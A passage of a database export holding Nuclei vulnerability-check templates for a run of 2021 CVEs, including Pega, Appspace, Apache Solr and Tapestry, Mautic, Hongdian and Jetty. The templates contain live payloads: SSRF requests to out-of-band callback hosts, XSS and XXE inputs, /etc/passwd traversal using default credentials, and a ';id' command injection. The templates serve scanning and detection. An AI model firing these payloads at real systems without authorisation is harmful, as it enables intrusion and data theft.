potential compromise of the Pega Infinity application.\n remediation: |\n Apply the necessary security patches or updates provided by Pega Infinity to mitigate the authentication bypass vulnerability (CVE-2021-27651).\n reference:\n - https://github.com/samwcyo/CVE-2021-27651-PoC/blob/main/RCE.md\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27651\n - https://collaborate.pega.com/discussion/pega-security-advisory-a21-hotfix-matrix\n - https://github.com/nomi-sec/PoC-in-GitHub\n - https://github.com/orangmuda/CVE-2021-27651\n 
classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-27651\n cwe-id: CWE-287\n epss-score: 0.07705\n epss-percentile: 0.94021\n cpe: cpe:2.3:a:pega:infinity:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: pega\n product: infinity\n tags: cve2021,cve,pega,auth-bypass\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/prweb/PRAuth/app/default/\"\n\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - compare_versions(version, '< 8.5.2', '>= 8.2.1')\n\n - type: word\n part: body\n words:\n - 'Pega Infinity'\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: version\n group: 1\n regex:\n - '(?m)Pega ([0-9.]+)'\n internal: true\n\n - type: regex\n group: 1\n regex:\n - '(?m)Pega ([0-9.]+)'\n# digest: 4b0a00483046022100bb3eb39482e6bae705caa5decca90a113164e112f360860f41ae3844effb25f3022100cbc7eeb4828f6198e465d2bec97ac6562e793c7c9b76a52e1c830319059eb040:922c64590222798bb761d5b6d8e72950", "hash": "dc9e65e69ec79e54d25778c4ddd569df", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308320" }, "name": "CVE-2021-27670.yaml", "content": "id: CVE-2021-27670\n\ninfo:\n name: Appspace 6.2.4 - Server-Side Request Forgery\n author: ritikchaddha\n severity: critical\n description: Appspace 6.2.4 allows SSRF via the api/v1/core/proxy/jsonprequest url parameter.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution.\n remediation: |\n Upgrade Appspace 6.2.4 to a patched version, or apply the necessary security patches provided by the vendor.\n reference:\n - https://github.com/h3110mb/PoCSSrfApp\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27670\n - https://github.com/ArrestX/--POC\n - https://github.com/KayCHENvip/vulnerability-poc\n - https://github.com/Miraitowa70/POC-Notes\n classification:\n 
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-27670\n cwe-id: CWE-918\n epss-score: 0.58348\n epss-percentile: 0.97664\n cpe: cpe:2.3:a:appspace:appspace:6.2.4:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: appspace\n product: appspace\n shodan-query: title:\"Appspace\"\n tags: cve,cve2021,appspace,ssrf\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"

    Interactsh Server

    \"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210089fc67fdff5afadc5dae929f61d4b47fe38949d2e34156c446d6f3c7933a76d802204f0f7d330a006d1cc55b25bc4ec8d916a9b84081b3612e8a2745c96cae680ba7:922c64590222798bb761d5b6d8e72950", "hash": "372997b27cb462a28c6ec86c45643378", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308321" }, "name": "CVE-2021-27748.yaml", "content": "id: CVE-2021-27748\n\ninfo:\n name: IBM WebSphere HCL Digital Experience - Server-Side Request Forgery\n author: pdteam\n severity: high\n description: |\n IBM WebSphere HCL Digital Experience is vulnerable to server-side request forgery that impacts on-premise deployments and containers.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to bypass security controls, access internal resources, and potentially perform further attacks.\n remediation: |\n Apply the latest security patches or updates provided by IBM to mitigate this vulnerability.\n reference:\n - https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/\n - https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27748\n classification:\n cve-id: CVE-2021-27748\n metadata:\n verified: true\n max-request: 3\n shodan-query: http.html:\"IBM WebSphere Portal\"\n tags: cve2021,cve,hcl,ibm,ssrf,websphere\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}'\n - '{{BaseURL}}/docpicker/internal_proxy/http/oast.me'\n - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me'\n\n host-redirects: true\n max-redirects: 2\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Interactsh Server\"\n\n - type: word\n part: body_1\n words:\n - \"Interactsh Server\"\n negative: true\n# digest: 
490a0046304402200ba3597e1cd51ea49029981ba317f0f962cc8082d2f3796e4d59fc9138bf9d9d0220226c8cb7207a0c85488b5ce96a38f6e0b616ebb9b487135b1fda864f9d6503d2:922c64590222798bb761d5b6d8e72950", "hash": "65bd5fb26fb5f7b2fe55eb136ad80815", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308322" }, "name": "CVE-2021-27850.yaml", "content": "id: CVE-2021-27850\n\ninfo:\n name: Apache Tapestry - Remote Code Execution\n author: pdteam\n severity: critical\n description: |\n Apache Tapestry contains a critical unauthenticated remote code execution vulnerability. Affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. Note that this vulnerability is a bypass of the fix for CVE-2019-0195. Before that fix it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches or updates provided by Apache to fix the vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27850\n - https://lists.apache.org/thread.html/r237ff7f286bda31682c254550c1ebf92b0ec61329b32fbeb2d1c8751%40%3Cusers.tapestry.apache.org%3E\n - http://www.openwall.com/lists/oss-security/2021/04/15/1\n - https://security.netapp.com/advisory/ntap-20210528-0002/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-27850\n cwe-id: CWE-502,CWE-200\n epss-score: 0.97388\n epss-percentile: 0.99903\n cpe: cpe:2.3:a:apache:tapestry:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: apache\n product: tapestry\n tags: cve,cve2021,apache,tapestry\n\nhttp:\n - raw:\n - |\n GET /assets/app/something/services/AppModule.class/ HTTP/1.1\n Host: {{Hostname}}\n Origin: {{BaseURL}}\n - |\n GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1\n Host: {{Hostname}}\n Origin: {{BaseURL}}\n\n 
matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - 'application/java'\n\n - type: word\n part: body\n words:\n - 'configuration'\n - 'webtools'\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: id\n group: 1\n regex:\n - '\\/assets\\/app\\/([a-z0-9]+)\\/services\\/AppMod'\n internal: true\n part: header\n# digest: 490a00463044022070f0c04ecf3a9fd26ce9b1691219435ab15f0cd55e185ba3586553743c17e82d02205e3a8a905f69891dc2c1c5b7651a0e91c63afc906d36ebdcd6425467650c5ab1:922c64590222798bb761d5b6d8e72950", "hash": "2f5ff1e7d33bcb040e9e23a9e7dd9094", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308323" }, "name": "CVE-2021-27905.yaml", "content": "id: CVE-2021-27905\n\ninfo:\n name: Apache Solr <=8.8.1 - Server-Side Request Forgery\n author: hackergautam\n severity: critical\n description: Apache Solr versions 8.8.1 and prior contain a server-side request forgery vulnerability. The ReplicationHandler (normally registered at \"/replication\" under a Solr core) in Apache Solr has a \"masterUrl\" (also \"leaderUrl\" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. 
To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the \"shards\" parameter.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution.\n remediation: This issue is resolved in Apache Solr 8.8.2 and later.\n reference:\n - https://www.anquanke.com/post/id/238201\n - https://ubuntu.com/security/CVE-2021-27905\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27905\n - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/\n - https://lists.apache.org/thread.html/r0ddc3a82bd7523b1453cb7a5e09eb5559517145425074a42eb326b10%40%3Cannounce.apache.org%3E\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-27905\n cwe-id: CWE-918\n epss-score: 0.94309\n epss-percentile: 0.99031\n cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: apache\n product: solr\n tags: cve2021,cve,apache,solr,ssrf\n\nhttp:\n - raw:\n - |\n GET /solr/admin/cores?wt=json HTTP/1.1\n Host: {{Hostname}}\n Accept-Language: en\n Connection: close\n - |\n GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://interact.sh HTTP/1.1\n Host: {{Hostname}}\n Accept-Language: en\n Connection: close\n\n matchers:\n - type: word\n part: body\n words:\n - 'OK'\n\n extractors:\n - type: regex\n name: core\n group: 1\n regex:\n - '\"name\"\\:\"(.*?)\"'\n internal: true\n# digest: 4a0a00473045022100a5eeed4aa78e0ab67f4cc386a9ff9940e1bf79af086160f50cfcb22b541c6ac2022077db0dfda45ed661c6094d7fc069db330ff5e1854903adc81a368722db443bdc:922c64590222798bb761d5b6d8e72950", "hash": "6a3a7e01c1662d6f9626142a20689cef", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308324" }, "name": "CVE-2021-27909.yaml", "content": "id: CVE-2021-27909\n\ninfo:\n name: Mautic <3.3.4 - Cross-Site 
Scripting\n author: kiransau\n severity: medium\n description: Mautic before 3.3.4 contains a cross-site scripting vulnerability on the password reset page in the bundle parameter of the URL. An attacker can inject arbitrary script, steal cookie-based authentication credentials, and/or launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.\n remediation: |\n Upgrade Mautic to version 3.3.4 or later to mitigate this vulnerability.\n reference:\n - https://github.com/mautic/mautic/security/advisories/GHSA-32hw-3pvh-vcvc\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27909\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-27909\n cwe-id: CWE-79\n epss-score: 0.00094\n epss-percentile: 0.3927\n cpe: cpe:2.3:a:acquia:mautic:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: acquia\n product: mautic\n shodan-query: title:\"Mautic\"\n tags: cve2021,cve,mautic,xss,acquia\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/passwordreset?bundle=';alert(document.domain);var+ok='\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"'';alert(document.domain);var ok='\"\n - 'mauticBasePath'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e683409a42481a5acd5030e9e2be3bff0665fbc807a45864c349a222da9660ed022100dcca043790c8a6718aacdfa104e0129441726aa52264f8642a352b641c03507c:922c64590222798bb761d5b6d8e72950", "hash": "3220efe2d0d8d0ff0c5787ea54bd6812", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308325" }, "name": "CVE-2021-27931.yaml", "content": "id: 
CVE-2021-27931\n\ninfo:\n name: LumisXP <10.0.0 - Blind XML External Entity Attack\n author: alph4byt3\n severity: critical\n description: LumisXP (aka Lumis Experience Platform) before 10.0.0 allows unauthenticated blind XML external entity (XXE) attacks via an API request to PageControllerXml.jsp. One can send a request crafted with an XXE payload and achieve outcomes such as reading local server files or denial of service.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, server compromise, or further attacks on internal systems.\n remediation: |\n Upgrade LumisXP to version 10.0.0 or above to mitigate the vulnerability.\n reference:\n - https://github.com/sl4cky/LumisXP-XXE---POC/blob/main/poc.txt\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27931\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\n cvss-score: 9.1\n cve-id: CVE-2021-27931\n cwe-id: CWE-611\n epss-score: 0.4974\n epss-percentile: 0.97222\n cpe: cpe:2.3:a:lumis:lumis_experience_platform:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: lumis\n product: lumis_experience_platform\n tags: cve2021,cve,lumis,xxe,oast,blind\n\nhttp:\n - raw:\n - |\n POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1\n Host: {{Hostname}}\n\n \n \n \n ]>\n \n &xxe;\n \n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4a0a004730450220581131eca2ef63301253ff49449855879636bad0e9afd4bbc06992068f084b32022100e42d20545e6f7a6ff2aaa16ec56637fab0aac6462036f42fe6dec31c13882d29:922c64590222798bb761d5b6d8e72950", "hash": "3d2a84a4cf5616c64b99fed2207a4cc6", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308326" }, "name": "CVE-2021-28073.yaml", "content": "id: CVE-2021-28073\n\ninfo:\n name: Ntopng Authentication Bypass\n author: z3bd\n severity: critical\n description: Ntopng, a passive network monitoring tool, 
contains an authentication bypass vulnerability in ntopng <= 4.2\n impact: |\n Successful exploitation of this vulnerability could result in unauthorized access to sensitive information and potential compromise of the affected system.\n remediation: Upgrade to version 4.3 or later.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27573\n - http://noahblog.360.cn/ntopng-multiple-vulnerabilities/\n - https://github.com/AndreaOm/docs/blob/c27d2db8dbedb35c9e69109898aaecd0f849186a/wikipoc/PeiQi_Wiki/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/HongKe/HongKe%20ntopng%20%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2021-28073.md\n classification:\n cve-id: CVE-2021-28073\n metadata:\n max-request: 2\n tags: cve2021,cve,ntopng\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css\"\n - \"{{BaseURL}}/lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css\"\n\n 
matchers-condition: and\n matchers:\n - type: word\n words:\n - \"application/json\"\n part: header\n\n - type: word\n words:\n - '\"results\":'\n - '\"name\":'\n - '\"tab\":'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d50866a099d181b7bf3a3a4199e766c27e8732b1396992dfc9484b85b678728c022100bda66f0395373be8fc0473f8e5339d875c03432fce8f5147a92d55b205357af8:922c64590222798bb761d5b6d8e72950", "hash": "c1164a433a41d90e3b7293c75a41643c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308327" }, "name": "CVE-2021-28149.yaml", "content": "id: CVE-2021-28149\n\ninfo:\n name: Hongdian H8922 3.0.5 Devices - Local File Inclusion\n author: gy741\n severity: medium\n description: |\n Hongdian H8922 3.0.5 devices are vulnerable to local file inclusion. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd). This can be carried out with a web browser by changing the file name accordingly. 
Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file.\n impact: |\n Successful exploitation of this vulnerability can result in unauthorized access to sensitive files, potentially leading to further compromise of the system.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Hongdian H8922 3.0.5 Devices.\n reference:\n - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/\n - http://en.hongdian.com/Products/Details/H8922\n - https://nvd.nist.gov/vuln/detail/CVE-2021-28149\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ArrestX/--POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2021-28149\n cwe-id: CWE-22\n epss-score: 0.05499\n epss-percentile: 0.93036\n cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: hongdian\n product: h8922_firmware\n tags: cve2021,cve,hongdian,traversal\n\nhttp:\n - raw:\n - |\n GET /log_download.cgi?type=../../etc/passwd HTTP/1.1\n Host: {{Hostname}}\n Cache-Control: max-age=0\n Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n - |\n GET /log_download.cgi?type=../../etc/passwd HTTP/1.1\n Host: {{Hostname}}\n Authorization: Basic YWRtaW46YWRtaW4=\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/octet-stream\"\n\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n - \"sshd:[x*]\"\n - \"root:[$]\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022079d42e417c59ebc709bfd0e05a3798b78d9393f12027b3df901af863aa6ccf3d022100d2b4d65bddfc8ca2eab9587d97cfc61f904100d1fdcc1317c978237d369a57c1:922c64590222798bb761d5b6d8e72950", "hash": "3b25b3bb3718b9bac4914bb075ba5519", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308328" }, "name": 
"CVE-2021-28150.yaml", "content": "id: CVE-2021-28150\n\ninfo:\n name: Hongdian H8922 3.0.5 - Information Disclosure\n author: gy741\n severity: medium\n description: Hongdian H8922 3.0.5 is susceptible to information disclosure. An attacker can access cli.conf (with the administrator password and other sensitive data) via /backup2.cgi and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n Successful exploitation of this vulnerability can lead to the exposure of sensitive data, potentially compromising the confidentiality of the system and its users.\n remediation: |\n Apply the latest security patch or update provided by Hongdian to fix the information disclosure vulnerability (CVE-2021-28150).\n reference:\n - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/\n - http://en.hongdian.com/Products/Details/H8922\n - https://nvd.nist.gov/vuln/detail/CVE-2021-28150\n classification:\n cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 5.5\n cve-id: CVE-2021-28150\n cwe-id: CWE-425\n epss-score: 0.00253\n epss-percentile: 0.63106\n cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: hongdian\n product: h8922_firmware\n tags: cve2021,cve,hongdian,exposure\n\nhttp:\n - raw:\n - |\n GET /backup2.cgi HTTP/1.1\n Host: {{Hostname}}\n Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n - |\n GET /backup2.cgi HTTP/1.1\n Host: {{Hostname}}\n Authorization: Basic YWRtaW46YWRtaW4=\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/octet-stream\"\n\n - type: word\n part: body\n words:\n - \"CLI configuration saved from vty\"\n - \"service webadmin\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100c210e8ed390ead0950a65257b8d9b9eed6a403b4234fe537f30c7d0529e9aad70220287ac350869e7bbabb19928f08ff35cffd9808b6371815e3dd78e9e0e64d7cce:922c64590222798bb761d5b6d8e72950", "hash": 
"3c313cca9cd84a39d346b187cd299e66", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308329" }, "name": "CVE-2021-28151.yaml", "content": "id: CVE-2021-28151\n\ninfo:\n name: Hongdian H8922 3.0.5 - Remote Command Injection\n author: gy741\n severity: high\n description: |\n Hongdian H8922 3.0.5 devices are susceptible to remote command injection via shell metacharacters into the ip-address (a/k/a Destination) field to the tools.cgi ping command, which is accessible with the username guest and password guest. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device.\n remediation: |\n Apply the latest security patch or update to a non-vulnerable version of the Hongdian H8922 firmware.\n reference:\n - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/\n - http://en.hongdian.com/Products/Details/H8922\n - https://nvd.nist.gov/vuln/detail/CVE-2021-28151\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ArrestX/--POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-28151\n cwe-id: CWE-78\n epss-score: 0.96847\n epss-percentile: 0.99638\n cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: hongdian\n product: h8922_firmware\n tags: cve2021,cve,hongdian,rce,injection\n\nhttp:\n - raw:\n - |\n POST /tools.cgi HTTP/1.1\n Host: {{Hostname}}\n Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n Origin: {{BaseURL}}\n Referer: {{BaseURL}}/tools.cgi\n\n op_type=ping&destination=%3Bid\n - |\n POST /tools.cgi HTTP/1.1\n Host: {{Hostname}}\n Authorization: Basic YWRtaW46YWRtaW4=\n Origin: {{BaseURL}}\n Referer: {{BaseURL}}/tools.cgi\n\n op_type=ping&destination=%3Bid\n\n 
matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n - \"application/x-www-form-urlencoded\"\n condition: or\n\n - type: regex\n regex:\n - 'uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)'\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220543f456226b5ababe273ce9ad8c34d065bb95024abb3a99cfd1b28be68fd898f02204b87ac2d557eb22432055d8b6319a30fc6e69fafa9032a16626296da752838d0:922c64590222798bb761d5b6d8e72950", "hash": "4d695eb460904017a58af5985e7bd0f8", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30832a" }, "name": "CVE-2021-28164.yaml", "content": "id: CVE-2021-28164\n\ninfo:\n name: Eclipse Jetty - Information Disclosure\n author: noamrathaus\n severity: medium\n description: |\n Eclipse Jetty 9.4.37.v20210219 to 9.4.38.v20210224 is susceptible to improper authorization. The default compliance mode allows requests with URIs that contain %2e or %2e%2e segments to access protected resources within the WEB-INF directory. 
An attacker can access sensitive information regarding the implementation of a web application.\n impact: |\n An attacker can exploit this vulnerability to access sensitive information, potentially leading to further attacks or unauthorized access.\n remediation: |\n Apply the latest security patches or updates provided by the Eclipse Jetty project to fix the information disclosure vulnerability.\n reference:\n - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5\n - https://github.com/vulhub/vulhub/tree/1239bca12c75630bb2033b728140ed5224dcc6d8/jetty\n - https://lists.apache.org/thread.html/r780c3c210a05c5bf7b4671303f46afc3fe56758e92864e1a5f0590d0@%3Cjira.kafka.apache.org%3E\n - http://packetstormsecurity.com/files/164590/Jetty-9.4.37.v20210219-Information-Disclosure.html\n - https://nvd.nist.gov/vuln/detail/cve-2021-28164\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-28164\n cwe-id: CWE-200,NVD-CWE-Other\n epss-score: 0.04805\n epss-percentile: 0.9254\n cpe: cpe:2.3:a:eclipse:jetty:9.4.37:20210219:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: eclipse\n product: jetty\n tags: cve2021,cve,packetstorm,vulhub,jetty,exposure,eclipse\nflow: http(1) && http(2)\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/WEB-INF/web.xml\"\n\n matchers:\n - type: dsl\n internal: true\n dsl:\n - \"!contains_all(body, '', 'java.sun.com')\"\n - \"!contains_all(header, 'application/xml')\"\n - \"status_code != 200\"\n - \"status_code != 404\"\n condition: and\n\n - method: GET\n path:\n - \"{{BaseURL}}/%2e/WEB-INF/web.xml\"\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - \"contains_all(body, '', 'java.sun.com')\"\n - \"contains_all(header, 'application/xml')\"\n - \"status_code == 200\"\n condition: and\n# digest: 
4a0a00473045022100886a031dbb45bd2585021ea2d7ea51b4bd28d2403afa70cd92fc253a0cb7d5cc022038e2460485ace429f2ae598ca2073cb289cfbe470e28f479fea812fe0e7abdd4:922c64590222798bb761d5b6d8e72950", "hash": "b5f4524dd0c8c835071a8c286dea0657", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30832b" }, "name": "CVE-2021-28169.yaml", "content": "id: CVE-2021-28169\n\ninfo:\n name: Eclipse Jetty ConcatServlet - Information Disclosure\n author: pikpikcu\n severity: medium\n description: |\n Eclipse Jetty through 9.4.40, through 10.0.2, and through 11.0.2 is susceptible to information disclosure. Requests to the ConcatServlet with a doubly encoded path can access protected resources within the WEB-INF directory, thus enabling an attacker to potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n An attacker can exploit this vulnerability to access sensitive information, potentially leading to further attacks or unauthorized access.\n remediation: |\n Upgrade to Eclipse Jetty version 9.4.40 or later to mitigate this vulnerability.\n reference:\n - https://twitter.com/sec715/status/1406787963569065988\n - https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq\n - https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3Cusers.kafka.apache.org%3E\n - https://nvd.nist.gov/vuln/detail/CVE-2021-28169\n - https://lists.apache.org/thread.html/r04a4b4553a23aff26f42635a6ae388c3b162aab30a88d12e59d05168@%3Cjira.kafka.apache.org%3E\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-28169\n cwe-id: CWE-200,NVD-CWE-Other\n epss-score: 0.00401\n epss-percentile: 0.70865\n cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: eclipse\n product: jetty\n tags: cve2021,cve,jetty,eclipse\n\nhttp:\n - method: 
